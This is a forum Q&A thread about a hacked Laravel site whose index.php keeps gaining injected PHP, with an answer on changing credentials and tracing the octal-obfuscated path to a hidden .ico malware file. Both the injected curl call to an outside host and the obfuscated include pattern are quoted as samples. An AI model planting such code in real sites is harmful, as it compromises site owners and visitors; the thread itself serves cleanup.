# Some script add automatically in root folder files in Laravel

Tags: laravel

My site has been created in Laravel and it has been hacked but we have started it and we have removed some unwanted code in files. But there is still some script automatically add to the root file(index.php) due to which the site is being affected.

Please give me some solution, what can we do to remove the automatic files from the root folder?

```
  <?php

      $exe = curl_init();

      curl_setopt($exe, CURLOPT_URL, "https://hacklink.market/panel/code?x=5");

      curl_exec($exe);

  ?>
```

This code is added automatically in index.php file.

Answer (score 1, accepted):

Please change the server credentials and the database credentials as well.

if you want to check the which file is called, you simply echo the statement and you will get that file.

```
  <?php
   /*df76c*/

   echo "\057ho\155e/\145ar\164ht\157he\141ve\156co\057pu\142li\143_h  \164ml\057li\142ra\162ie\163/f\060f/\151nt\145gr\141ti\157n/\05659\06725\06435\056ic\157";

  /*df76c*/
 ?>
```

This will return your server path with the infected file main script.

```
 /home/earthtoheavenco/public_h tml/libraries/f0f/integration/.59725435.ico
```

Please delete all such these files from your server end.

Hope this will help you. Thanks

Comment: I have changed the server and database credentials, but still automatic script adding files in it.